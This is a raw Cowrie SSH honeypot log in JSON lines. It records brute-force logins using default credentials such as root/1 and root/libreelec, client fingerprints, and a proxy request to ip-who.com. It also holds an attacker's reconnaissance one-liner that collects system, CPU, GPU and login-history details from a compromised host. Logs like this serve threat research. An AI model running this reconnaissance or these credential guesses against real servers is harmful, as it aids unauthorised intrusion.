{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:48:13.650629Z","src_ip":"212.227.125.160","session":"a0dcf011bbb9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55132,"dst_ip":"1.2.3.4","dst_port":22,"session":"3fbb504197ff","protocol":"ssh","message":"New connection: 212.227.125.160:55132 (1.2.3.4:22) [session: 3fbb504197ff]","sensor":"my-vps","timestamp":"2025-08-31T04:48:13.848454Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:48:13.849324Z","src_ip":"212.227.125.160","session":"3fbb504197ff"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:48:14.036793Z","src_ip":"212.227.125.160","session":"3fbb504197ff"}
{"eventid":"cowrie.login.success","username":"root","password":"1","message":"login attempt [root/1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:48:14.148829Z","src_ip":"212.227.125.160","session":"a0dcf011bbb9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:48:14.917101Z","src_ip":"212.227.125.160","session":"a0dcf011bbb9"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-31T04:48:14.917782Z","src_ip":"212.227.125.160","session":"a0dcf011bbb9"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T04:48:14.918243Z","src_ip":"212.227.125.160","session":"a0dcf011bbb9"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T04:48:14.919355Z","src_ip":"212.227.125.160","session":"a0dcf011bbb9"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-31T04:48:14.920811Z","src_ip":"212.227.125.160","session":"a0dcf011bbb9"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T04:48:14.921442Z","src_ip":"212.227.125.160","session":"a0dcf011bbb9"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T04:48:14.922234Z","src_ip":"212.227.125.160","session":"a0dcf011bbb9"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-31T04:48:14.923536Z","src_ip":"212.227.125.160","session":"a0dcf011bbb9"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-31T04:48:14.924301Z","src_ip":"212.227.125.160","session":"a0dcf011bbb9"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T04:48:14.924954Z","src_ip":"212.227.125.160","session":"a0dcf011bbb9"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T04:48:14.925551Z","src_ip":"212.227.125.160","session":"a0dcf011bbb9"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T04:48:14.926570Z","src_ip":"212.227.125.160","session":"a0dcf011bbb9"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T04:48:14.927726Z","src_ip":"212.227.125.160","session":"a0dcf011bbb9"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp123","message":"login attempt [ftp/ftp123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:48:14.929865Z","src_ip":"212.227.125.160","session":"3fbb504197ff"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-31T04:48:15.094882Z","src_ip":"212.227.125.160","session":"a0dcf011bbb9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:48:15.096098Z","src_ip":"212.227.125.160","session":"a0dcf011bbb9"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:48:15.097201Z","src_ip":"212.227.125.160","session":"a0dcf011bbb9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345678","message":"login attempt [admin/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T04:48:16.037274Z","src_ip":"212.227.235.229","session":"08878f209347"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:48:16.119660Z","src_ip":"212.227.125.160","session":"3fbb504197ff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60950,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9081d1d466c","protocol":"ssh","message":"New connection: 212.227.235.229:60950 (1.2.3.4:22) [session: a9081d1d466c]","sensor":"my-vps","timestamp":"2025-08-31T04:48:17.163623Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:48:17.259303Z","src_ip":"212.227.235.229","session":"a9081d1d466c"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:48:17.297953Z","src_ip":"212.227.235.229","session":"08878f209347"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:48:17.523056Z","src_ip":"212.227.235.229","session":"c5c39f7b9774"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:48:17.524163Z","src_ip":"212.227.235.229","session":"c5c39f7b9774"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49288,"dst_ip":"1.2.3.4","dst_port":22,"session":"91afa8e99db5","protocol":"ssh","message":"New connection: 212.227.125.160:49288 (1.2.3.4:22) [session: 91afa8e99db5]","sensor":"my-vps","timestamp":"2025-08-31T04:48:18.711765Z"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:48:19.208819Z","src_ip":"212.227.235.229","session":"a9081d1d466c"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:48:19.329278Z","src_ip":"212.227.125.160","session":"91afa8e99db5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:48:19.329958Z","src_ip":"212.227.125.160","session":"91afa8e99db5"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"P@ssw0rd123","message":"login attempt [postgres/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:48:21.660529Z","src_ip":"212.227.125.160","session":"91afa8e99db5"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"tomcat123","message":"login attempt [tomcat/tomcat123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:48:22.218368Z","src_ip":"212.227.125.160","session":"78e10392a954"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39438,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5ac44907e6a","protocol":"ssh","message":"New connection: 212.227.235.229:39438 (1.2.3.4:22) [session: a5ac44907e6a]","sensor":"my-vps","timestamp":"2025-08-31T04:48:22.385126Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:48:22.386062Z","src_ip":"212.227.235.229","session":"a5ac44907e6a"}
{"eventid":"cowrie.login.failed","username":"kim","password":"kim123","message":"login attempt [kim/kim123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:48:22.613096Z","src_ip":"212.227.235.229","session":"a9081d1d466c"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:48:22.632406Z","src_ip":"212.227.235.229","session":"a5ac44907e6a"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:48:23.121300Z","src_ip":"212.227.125.160","session":"91afa8e99db5"}
{"eventid":"cowrie.session.closed","duration":"6.7","message":"Connection lost after 6.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:48:23.873814Z","src_ip":"212.227.235.229","session":"a9081d1d466c"}
{"eventid":"cowrie.login.success","username":"root","password":"libreelec","message":"login attempt [root/libreelec] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:48:24.851244Z","src_ip":"212.227.235.229","session":"a5ac44907e6a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-31T04:48:25.358854Z","session":"a5ac44907e6a"}
